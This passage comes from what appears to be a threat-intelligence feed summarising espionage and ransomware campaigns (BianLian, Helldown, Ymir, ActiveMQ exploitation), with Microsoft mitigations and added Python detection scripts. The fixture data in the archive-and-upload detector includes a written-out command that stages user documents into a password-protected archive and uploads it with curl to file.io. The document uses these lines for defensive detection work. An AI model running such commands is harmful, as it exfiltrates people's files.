credentials, from targeted organizations. The threat actors maintained prolonged access to target environments, allowing them to map the network and identify systems of interest. According to Symantec, data was exfiltrated using WinRAR to gather and compress files of interest into password-protected archives. These archives were then uploaded to cloud storage platforms like File.io, allowing the attackers to discreetly transfer the data. 
## Microsoft Analysis and Additional OSINT Context Most Chinese threat activity is for intelligence collection purposes and, as represented in Microsoft Threat Intelligence nation-state notification (NSN) data, is especially prevalent in Association of Southeast Asian Nations countries around the South China Sea. To learn more about Chinese cyber threat activity in and around the South China Sea, read [Microsoft's most recent Digital Defense Report](https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/final/en-us/microsoft-brand/documents/Microsoft%20Digital%20Defense%20Report%202024%20%281%29.pdf). ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat.  - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Turn on [tamper protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection) features to prevent attackers from stopping security services. - Run [endpoint detection and response (EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode) so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach. 
- Enable [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations) in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. ## Detections/Hunting Queries ### Microsoft Defender Antivirus Microsoft Defender Antivirus detects threat components as the following malware: - [Trojan:Win32/LotusBlossom](https://www.microsoft.com/en-us/wdsi/threats/mal Malware Tool Threat Cloud APT 41 ★★★
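The staging pattern in this entry (WinRAR with a password switch, then an upload to a file-sharing site from the same host shortly afterwards) is easy to express as a correlation over process-creation events. The block below is an added example, not a Symantec or Microsoft detection: it pairs each password-protected archive creation with a later upload command on the same host inside a time window. The event records, the command lines and the upload-host list are constructed; extend the list with the services that matter in your environment.

```python
import re
from datetime import datetime, timedelta

ARCHIVERS = {"rar.exe", "winrar.exe"}
# "a" adds files to an archive; -hp<pw> encrypts headers and data, -p<pw> encrypts data only
PASSWORD_SWITCH = re.compile(r"(?:^|\s)-(?:hp|p)\S*")
# Assumption: extend this with the upload services relevant to your environment
UPLOAD_HOSTS = ("file.io",)


def is_password_archive_cmd(image: str, cmdline: str) -> bool:
    """True for a WinRAR/rar.exe invocation that creates a password-protected archive."""
    exe = image.lower().rsplit("\\", 1)[-1]
    if exe not in ARCHIVERS:
        return False
    tokens = cmdline.split()
    return len(tokens) > 1 and tokens[1].lower() == "a" and PASSWORD_SWITCH.search(cmdline) is not None


def is_upload_cmd(cmdline: str) -> bool:
    low = cmdline.lower()
    return any(host in low for host in UPLOAD_HOSTS)


def correlate_archive_and_upload(events, window=timedelta(hours=1)) -> list:
    """Pair each password-protected archive creation with a later upload from the same host.

    events: iterable of dicts with keys ts (datetime), host, image, cmdline.
    """
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    findings = []
    for host, evs in by_host.items():
        archives = [e for e in evs if is_password_archive_cmd(e["image"], e["cmdline"])]
        uploads = [e for e in evs if is_upload_cmd(e["cmdline"])]
        for a in archives:
            for u in uploads:
                delta = u["ts"] - a["ts"]
                if timedelta(0) <= delta <= window:
                    findings.append({
                        "host": host,
                        "archive_cmd": a["cmdline"],
                        "upload_cmd": u["cmdline"],
                        "minutes_between": int(delta.total_seconds() // 60),
                    })
    return findings


# Constructed process-creation events (not telemetry from the Symantec report).
SAMPLE_EVENTS = [
    {"ts": datetime(2024, 11, 20, 9, 0), "host": "WS-0142",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://file.io"},                       # upload before any archive: ignored
    {"ts": datetime(2024, 11, 20, 10, 0), "host": "WS-0142",
     "image": r"C:\Program Files\WinRAR\rar.exe",
     "cmdline": r"rar.exe a -hpP@ssw0rd -r C:\Users\Public\out.rar C:\Users\alice\Documents"},
    {"ts": datetime(2024, 11, 20, 10, 7), "host": "WS-0142",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe -F "file=@C:\Users\Public\out.rar" https://file.io'},
    {"ts": datetime(2024, 11, 20, 11, 30), "host": "WS-0201",
     "image": r"C:\Program Files\WinRAR\rar.exe",
     "cmdline": r"rar.exe a D:\backup\weekly.rar D:\data"},       # no password switch: not staged exfil
]

if __name__ == "__main__":
    for finding in correlate_archive_and_upload(SAMPLE_EVENTS):
        print(finding)
```

Backups that create plain archives, as on the second host, stay out of the result set; the password switch is the discriminator because it is what makes the staged data opaque to DLP and proxy inspection.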
RiskIQ.webp 2024-12-09 12:22:03 Weekly OSINT Highlights, 9 December 2024 (lien direct) ## Snapshot Last week's OSINT reporting highlights a diverse range of cyber threats spanning ransomware, espionage, supply chain attacks, and disinformation campaigns. Espionage activity remains prominent, with Chinese and Russian actors targeting organizations for geopolitical and industrial intelligence. Key trends include the exploitation of vulnerabilities in widely used software, such as Apache ActiveMQ (CVE-2023-46604) and Docker APIs, and advanced malware like SmokeLoader and MOONSHINE to target industries ranging from manufacturing to financial services. Ransomware groups, including Howling Scorpius and Venom Spider, leverage sophisticated techniques like double extortion and hybrid encryption, focusing on SMBs and enterprises. Targets span global industries, including sensitive infrastructure, while attack vectors predominantly involve phishing, misconfigured systems, and supply chain manipulation, underscoring the adaptability and persistence of modern threat actors. ## Description 1. [Manufacturing Sector Cyberattack](https://sip.security.microsoft.com/intel-explorer/articles/d976ecc3): Cyble Research and Intelligence Labs uncovered a campaign targeting the manufacturing sector with malicious LNK files masquerading as PDFs. The attack employs LOLBins, DLL sideloading, and advanced obfuscation techniques, using tools like Lumma stealer and Amadey bot to exfiltrate data and establish persistence. 2. [Phishing Malware Impersonating the National Tax Service (NTS)](https://sip.security.microsoft.com/intel-explorer/articles/6542e5a4): AhnLab has observed a significant increase in phishing emails impersonating the National Tax Service (NTS), particularly during tax filing periods. 
These phishing attempts involve emails with manipulated sender addresses to appear as if they are from the NTS, and they contain malicious attachments in various formats or hyperlinks leading to malware-hosting websites and the ultimate deployment of XWorm malware. 3. [Solana Web3.js library backdoored to steal secret, private keys](https://sip.security.microsoft.com/intel-explorer/articles/04dd6cf6): Socket security firm reported that versions 1.95.6 and 1.95.7 of the Solana Web3.js library contained code designed to exfiltrate private and secret keys, which could allow attackers to drain funds from wallets. The attack is believed to be the result of a social engineering/phishing attack targeting maintainers of the official Web3.js open-source library maintained by Solana. 4. [Exploitation of CVE-2023-46604 in Korea](https://sip.security.microsoft.com/intel-explorer/articles/ccb7bd15): AhnLab identified active exploitation of Apache ActiveMQ vulnerability CVE-2023-46604, enabling remote code execution on unpatched Korean systems. Threat actors, including Andariel and Mauri ransomware groups, used tools like Quasar RAT and AnyDesk to exfiltrate data and control compromised environments. 5. [China-Linked Espionage on U.S.-China Organization](https://sip.security.microsoft.com/intel-explorer/articles/9c09d15e): Symantec reported a four-month-long intrusion by suspected Chinese threat actors targeting a U.S. organization with a Chinese presence. The attackers used DLL sideloading, Impacket, and credential-dumping tactics to exfiltrate data, leveraging tools like FileZilla and PSCP for intelligence gathering. 6. [Earth Minotaur's MOONSHINE Campaign](https://sip.security.microsoft.com/intel-explorer/articles/699406a4): Trend Micro detailed Earth Minotaur's use of the MOONSHINE exploit kit to target vulnerabilities in Android apps like WeChat, delivering the DarkNimbus backdoor. 
The campaign, likely linked to Chinese actors, focuses on Uyghur and Tibetan communities, employing phishing and Chromium browser exploits to monitor devices. 7. [Vulnerabilities in RAG Systems](https://sip.security.microsoft.com/intel-explorer/articles/53083f3e): Trend Micro exposed critical vulnerabilities in Retrieval-Augmented Generation (RAG) systems, including vector stores and LLM hosting platforms like l Ransomware Malware Tool Vulnerability Threat Mobile Industrial Prediction APT 45 ★★★
RiskIQ.webp 2024-12-06 16:17:50 Mauri Ransomware Threat Actors Exploiting Apache ActiveMQ Vulnerability (CVE-2023-46604) (lien direct) ## Snapshot Researchers at AhnLab Security Intelligence Response Center (ASEC) have identified that the [CVE-2023-46604](https://security.microsoft.com/intel-profiles/CVE-2023-46604) vulnerability in Apache ActiveMQ servers is being exploited on Korean systems. This vulnerability allows remote code execution by manipulating serialized class types in the OpenWire protocol. ## Description The vulnerability began to be actively exploited soon after its disclosure, with incidents linked to the Andariel group and [HelloKitty](https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/) ransomware. The targeting of unpatched systems has been continuous, with attackers deploying tools such as Ladon, Netcat, AnyDesk, and z0Miner to compromise environments. Recently, ASEC has observed evidence that Mauri ransomware threat actors are exploiting CVE-2023-46604, using Quasar RAT as part of the attack chain to exfiltrate information and gain control over systems through remote desktop. While no Mauri ransomware attacks have been confirmed, ASEC notes that Mauri ransomware has been uploaded to the download server. ## Microsoft Analysis and Additional OSINT Context Microsoft Threat Intelligence has identified threat activity exploiting CVE-2023-46604 to facilitate HelloKitty ransomware attacks. The threat actor exploited CVE-2023-46604 to deliver and launch malicious MSI binaries using msiexec.exe. The actor then tampered with system services and launched the ransomware. Microsoft has also observed indicators of additional activity targeting ActiveMQ since late October 2023, though the exploitation method was not confirmed. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. 
Check the recommendations card for the deployment status of monitored mitigations. - Due to active attacks in the wild and the availability of exploitation details, organizations should upgrade affected servers immediately. According to Apache, upgrade ActiveMQ servers to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 to address this issue. - Review logs and alerts for any indications of exploitation or post-compromise activity on affected servers, such as malicious files dropped and executed via the msiexec.exe command. Upgrading ActiveMQ will not remediate any attacker artifacts. - If evidence of exploitation is discovered, reset the credentials for accounts that have been used on the server, or have logged onto the server. Any service accounts related to ActiveMQ should also have their credentials rotated. - Harden servers by following Apache's [ActiveMQ security recommendations](https://activemq.apache.org/security). Enabling authentication for brokers can prevent an attacker from moving laterally to another broker without proper authentication. - Refer to our threat overview on [human-operated ransomware](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport?ocid=magicti_ta_ta2) for recommendations on security hardening and monitoring to defend against ransomware. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. 
- Run Endpoint Detection and Response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-b Ransomware Tool Vulnerability Threat APT 45 ★★
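The first recommendation above is an upgrade to a branch-specific fixed release, which is awkward to check across a fleet because "5.16.7 is fixed but 5.17.5 is not" cannot be expressed as a single version comparison. The following added example (not code from ASEC, Microsoft or Apache) encodes the fixed releases named in the entry per branch and triages a list of ActiveMQ jar paths collected from hosts. It treats branches older than 5.15 as vulnerable, since Apache's advisory covers every release before 5.15.16, and branches released after the fix (5.19 and 6.x) as not affected; the jar naming pattern and the file listing are assumptions and constructed data.

```python
import re

# Fixed releases named in the entry (Apache's CVE-2023-46604 advisory), keyed by branch.
FIXED_BY_BRANCH = {(5, 15): 16, (5, 16): 7, (5, 17): 6, (5, 18): 3}
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")
# Assumption about naming: ActiveMQ ships artifacts such as activemq-broker-5.18.2.jar
JAR_RE = re.compile(r"activemq-(?:all|broker|client|openwire-legacy)-(\d+\.\d+\.\d+)\.jar$", re.I)


def parse_version(text: str) -> tuple:
    """Extract (major, minor, patch) from a string such as '5.18.2' or '5.18.2-SNAPSHOT'."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_cve_2023_46604(version: str) -> bool:
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch in FIXED_BY_BRANCH:
        return patch < FIXED_BY_BRANCH[branch]
    if branch < (5, 15):
        return True   # older branches never received a fix; the advisory covers everything before 5.15.16
    return False      # 5.19+ and 6.x shipped after the fix


def version_from_jar_name(path: str):
    """Return the version embedded in an ActiveMQ jar file name, or None for other jars."""
    m = JAR_RE.search(path.replace("\\", "/"))
    return m.group(1) if m else None


def triage_jars(jar_paths) -> dict:
    """Map each ActiveMQ jar path found on a host to True (vulnerable) or False (fixed)."""
    result = {}
    for path in jar_paths:
        version = version_from_jar_name(path)
        if version is not None:
            result[path] = is_vulnerable_cve_2023_46604(version)
    return result


# Constructed file listing from several hosts (not data from the ASEC or Microsoft reports).
SAMPLE_JARS = [
    "/opt/apache-activemq-5.18.2/lib/activemq-broker-5.18.2.jar",
    "/opt/activemq/lib/activemq-client-5.18.3.jar",
    "/srv/mq/activemq-all-5.15.9.jar",
    r"C:\activemq\lib\activemq-openwire-legacy-5.16.7.jar",
    "/opt/activemq/lib/log4j-1.2.17.jar",
]

if __name__ == "__main__":
    for path, vulnerable in triage_jars(SAMPLE_JARS).items():
        print("VULNERABLE" if vulnerable else "fixed     ", path)
```

A jar version only tells you what is installed, not whether the broker was already exploited; as the entry notes, upgrading does not remove attacker artifacts, so a vulnerable result should trigger the log review and credential rotation steps as well.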
RiskIQ.webp 2024-11-27 20:21:51 CISA says BianLian Ransomware Now Focuses Only on Data Theft (lien direct) ## Snapshot The BianLian ransomware operation, initially known for its double-extortion model involving encryption and data exfiltration, has now transitioned to focusing primarily on data theft extortion. ## Description This shift was highlighted in an updated advisory from the U.S. Cybersecurity & Infrastructure Security Agency (CISA), the FBI, and the Australian Cyber Security Centre. The advisory notes that BianLian has moved away from file encryption, particularly after a decryptor was released by Avast in January 2023, and has been exclusively practicing exfiltration-based extortion since January 2024. BianLian's updated tactics include targeting Windows and ESXi infrastructure, potentially using the ProxyShell exploit chain for initial access, and exploiting CVE-2022-37969 to escalate privileges on Windows 10 and 11. The group uses Ngrok and modified Rsocks to create SOCKS5 tunnels to mask traffic destinations, employs UPX packing to evade detection, and renames binaries and tasks to mimic legitimate Windows services. Additionally, they create Domain Admin and Azure AD accounts, perform network login connections via SMB, install webshells on Exchange servers, and use PowerShell scripts to compress data before exfiltration. The group has also introduced a new Tox ID for victim communication and prints ransom notes on printers connected to compromised networks, even calling employees to pressure them. Active since 2022, BianLian has listed 154 victims on its extortion portal and has been involved in notable breaches, including those against Air Canada, Northern Minerals, and the Boston Children's Health Physicians. The group has also claimed breaches against several other organizations, although these have not been confirmed. Despite their Russian origin, BianLian attempts to obscure their location by using foreign-language names. 
## Recommendations Microsoft recommends the following mitigations to defend against this threat: - Keep software up to date. Apply new security patches as soon as possible. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc) to help prevent access to malicious domains. - Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
- Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening. Microsoft Defender customers can turn on [attack surface reduction rules](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc) to help prevent common attack techniques used in attacks like these: - [Block executab
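The entry notes that BianLian packs its tooling with UPX and renames binaries to mimic Windows services, so a file name tells you little and a quick structural look at the PE is the better triage step. The block below is an added example (not CISA, FBI or Microsoft code): a minimal PE section-header parser that reports UPX-style section names, the `UPX!` marker in the header area, and sections whose raw bytes have near-maximal entropy, which is what compressed or encrypted payloads look like. The two PE images it inspects are constructed in the block itself (structurally valid headers, no executable code) so the check runs offline.

```python
import math
import struct

# IMAGE_FILE_HEADER and IMAGE_SECTION_HEADER layouts (little-endian)
COFF_FMT = "<HHIIIHH"        # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, relocs/linenums, Characteristics


def pe_sections(data: bytes) -> list:
    """Return name, raw offset and raw size of every section header in a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff_off = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff_off)
    sec_off = coff_off + struct.calcsize(COFF_FMT) + opt_size
    sections = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_FMT, data, sec_off + i * struct.calcsize(SECTION_FMT))
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "raw_size": f[3], "raw_offset": f[4]})
    return sections


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte; compressed or encrypted data sits close to 8.0."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def upx_indicators(data: bytes) -> dict:
    secs = pe_sections(data)
    return {
        "upx_section_names": [s["name"] for s in secs if s["name"].upper().startswith("UPX")],
        "upx_marker": b"UPX!" in data[:0x1000],  # signature UPX leaves in the header area
        "high_entropy_sections": [s["name"] for s in secs
                                  if shannon_entropy(data[s["raw_offset"]:s["raw_offset"] + s["raw_size"]]) > 7.0],
    }


def looks_upx_packed(data: bytes) -> bool:
    ind = upx_indicators(data)
    return bool(ind["upx_section_names"]) or ind["upx_marker"]


def build_minimal_pe(sections: dict, opt_size: int = 224, align: int = 0x200) -> bytes:
    """Constructed sample: a structurally valid (not runnable) PE with the given sections."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack(COFF_FMT, 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    header_len = e_lfanew + 4 + len(coff) + opt_size + len(sections) * struct.calcsize(SECTION_FMT)
    header_len = -(-header_len // align) * align
    hdrs, bodies, raw_off, va = b"", b"", header_len, 0x1000
    for name, body in sections.items():
        raw_size = -(-len(body) // align) * align
        body = body.ljust(raw_size, b"\0")
        hdrs += struct.pack(SECTION_FMT, name.encode("ascii"), len(body), va, raw_size, raw_off, 0, 0, 0, 0, 0x60000020)
        bodies += body
        raw_off += raw_size
        va += 0x1000
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + hdrs).ljust(header_len, b"\0")
    return header + bodies


HIGH_ENTROPY = bytes(range(256)) * 2   # constructed filler, entropy exactly 8.0
PACKED_SAMPLE = build_minimal_pe({"UPX0": b"", "UPX1": HIGH_ENTROPY, ".rsrc": b"\0" * 64})
PLAIN_SAMPLE = build_minimal_pe({".text": b"\x90" * 512, ".rdata": b"A" * 64, ".data": b"\0" * 64})

if __name__ == "__main__":
    for label, sample in (("packed", PACKED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, looks_upx_packed(sample), upx_indicators(sample))
```

Section names and the marker are trivial for an operator to strip or rename, which is why the entropy list is reported separately: a renamed binary whose largest section still reads near 8 bits per byte deserves the same attention as one that says UPX on the tin.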
RiskIQ.webp 2024-11-22 21:45:45 Helldown Ransomware: An Overview of this Emerging Threat (lien direct) ## Snapshot Researchers at Sekoia have reported with medium confidence that the 'Helldown' ransomware operation is exploiting vulnerabilities in Zyxel firewalls to infiltrate corporate networks. ## Description Helldown, which was first documented in August 2024, has been growing rapidly, listing numerous victims on its data extortion portal. The ransomware has a Linux variant that targets VMware files, with capabilities to list and kill VMs to encrypt images, though it appears to be under development. Helldown for Windows is believed to be based on the leaked LockBit 3 builder and shows operational similarities to Darkrace and Donex, but no definitive connection has been established. Helldown is not particularly selective in the data it steals, publishing large data packs on its website, with one instance reaching up to 431GB. The ransomware uses a random victim string as the extension for encrypted files and includes this string in the ransom note's filename. Sekoia's investigation suggests that Helldown may be using CVE-2024-42057, a command injection vulnerability in Zyxel firewalls' IPSec VPN, to execute OS commands and establish a foothold in networks. The attackers reportedly use a malicious account to access domain controllers, move laterally, and disable endpoint defenses. Payloads connected to the Zyxel compromise were uploaded to VirusTotal from Russia, indicating the possibility of private n-day exploit usage. As of the latest reports, 31 victims have been listed on Helldown's extortion portal, primarily small and medium-sized firms in the United States and Europe. ## Recommendations Microsoft recommends the following mitigations to defend against this threat: - Keep software up to date. Apply new security patches as soon as possible. 
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc) to help prevent access to malicious domains. - Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
- Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening. Microsoft Defender customers can turn on [attack surface reduction rules](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc) to help prevent common attack techniques used in attacks like these: - [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-executable-files-from-running-unless-they-meet-a-prevalence-a Ransomware Malware Tool Vulnerability Threat APT 45 ★★
RiskIQ.webp 2024-11-18 12:22:31 Weekly OSINT Highlights, 18 November 2024 (lien direct) ## Snapshot Last week's OSINT reporting highlights a diverse array of cyber threats, including ransomware, phishing, espionage, and supply chain attacks. Key trends include evolving attack vectors like malicious .LNK files and PowerShell-based lateral movements, as seen in campaigns targeting Pakistan and other regions. Threat actors span from state-sponsored groups such as North Korea's Lazarus and China's TAG-112 to financially motivated groups like SilkSpecter, with targets including critical sectors like manufacturing, government, healthcare, and e-commerce. Information stealers emerged as a notable theme, with malware such as RustyStealer, Fickle Stealer, and PXA Stealer employing advanced obfuscation and multi-vector attacks to exfiltrate sensitive data from diverse sectors.  The reports underscore sophisticated evasion tactics, the leveraging of legitimate platforms for malware delivery, and the persistent targeting of vulnerable backup and storage systems. ## Description 1. [Ymir Ransomware Attack](https://sip.security.microsoft.com/intel-explorer/articles/1444d044): Researchers at Kaspersky identified Ymir, a ransomware variant that performs operations entirely in memory and encrypts data using the ChaCha20 algorithm. Attackers used PowerShell-based lateral movement and reconnaissance tools, employing RustyStealer malware to gain initial access and steal data, targeting systems in Colombia among other regions. 2. [WIRTE Group Cyber Attacks](https://sip.security.microsoft.com/intel-explorer/articles/17c5101d): Check Point Research linked WIRTE, a Hamas-connected group, to espionage and disruptive cyber attacks in 2024, including PDF lure-driven Havoc framework deployments and SameCoin wiper campaigns targeting Israeli institutions. 
WIRTE, historically aligned with the Molerats, focuses on politically motivated attacks in the Middle East, showcasing ties to Gaza-based cyber activities. 3. [DoNot Group Targets Pakistani Manufacturing](https://sip.security.microsoft.com/intel-explorer/articles/25ee972c): The DoNot group launched a campaign against Pakistan's manufacturing sector, focusing on maritime and defense industries, using malicious .LNK files disguised as RTF documents to deliver stager malware via PowerShell. The campaign features advanced persistence mechanisms, updated AES encryption for C&C communications, and dynamic domain generation, highlighting their evolving evasion tactics. 4. [Election System Honeypot Findings](https://sip.security.microsoft.com/intel-explorer/articles/1a1b4eb7): Trustwave SpiderLabs' honeypot for U.S. election infrastructure recorded attacks like brute force, SQL injection, and CVE exploits by botnets including Mirai and Hajime. The attacks, largely driven by exploit frameworks and dark web collaboration, underline persistent threats against election systems. 5. [Chinese TAG-112 Tibetan Espionage](https://sip.security.microsoft.com/intel-explorer/articles/11ae4e70): In May 2024, TAG-112, suspected to be Chinese state-sponsored, compromised Tibetan community websites via Joomla vulnerabilities to deliver Cobalt Strike payloads disguised as security certificates. The campaign reflects Chinese intelligence's enduring interest in monitoring and disrupting Tibetan and other minority organizations. 6. [Phishing Campaigns Exploit Ukrainian Entities](https://sip.security.microsoft.com/intel-explorer/articles/95253614a): Russian-linked threat actor UAC-0194 targeted Ukrainian entities with phishing campaigns, exploiting CVE-2023-320462 and CVE-2023-360251 through malicious hyperlinks in emails. The attacks leveraged compromised municipal servers to host malware and facilitate privilege escalation and security bypasses. 7. 
[Lazarus Group's MacOS Targeting](https://sip.security.microsoft.com/intel-explorer/articles/7c6b391d): Lazarus, a North Korean threat actor, deployed RustyAttr malware targeting macOS via malicious apps using the Tauri framework, hiding payloads in Extended Attributes (EA). This campaign reflects evolvin Ransomware Malware Tool Vulnerability Threat Prediction Medical Cloud Technical APT 41 APT 38 ★★★
DarkReading.webp 2024-11-13 22:39:34 Toolkit Vastly Expands APT41\\'s Surveillance Powers (lien direct) The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.
APT 41 ★★
RiskIQ.webp 2024-11-13 20:50:44 Ymir: New Stealthy Ransomware in the Wild (lien direct) ## Snapshot Researchers at Kaspersky have identified a new ransomware family named "Ymir," which evades detection by performing operations in memory and uses the ChaCha20 algorithm for file encryption. ## Description The attackers initially gained access through PowerShell remote control commands, installed reconnaissance tools like Process Hacker and Advanced IP Scanner, and reduced system security before executing Ymir. The ransomware generates a ransom note in PDF format in every directory, falsely claiming data theft, although it lacks network capabilities. Instead, data theft is suggested to occur through other means, as indicated by the presence of a separate threat, RustyStealer, which allows attackers to control machines and gather information. In a related incident in Colombia, attackers compromised a domain controller using credentials obtained by RustyStealer, moved laterally within the network using WinRM and PowerShell, and executed scripts associated with the proxy malware SystemBC. These scripts established covert channels to C2 servers for data exfiltration. The initial RustyStealer sample was a PE file named "AudioDriver2.0.exe" and connected to a C2 server active since August 2024. Ymir's deployment was followed by efforts to cover tracks, including searching for PowerShell to delete itself after execution. The Ymir ransomware is currently undecryptable, and no dedicated leak site has been presented by the attackers. The analysis revealed a link between malware stealer botnets acting as access brokers and ransomware execution, with TTPs for both Ymir and RustyStealer provided, including file and directory discovery, system information discovery, PowerShell scripting, data encryption for impact, and evasion techniques. ## Recommendations Microsoft recommends the following mitigations to defend against this threat: - Keep software up to date. 
Apply new security patches as soon as possible. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc) to help prevent access to malicious domains. - Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
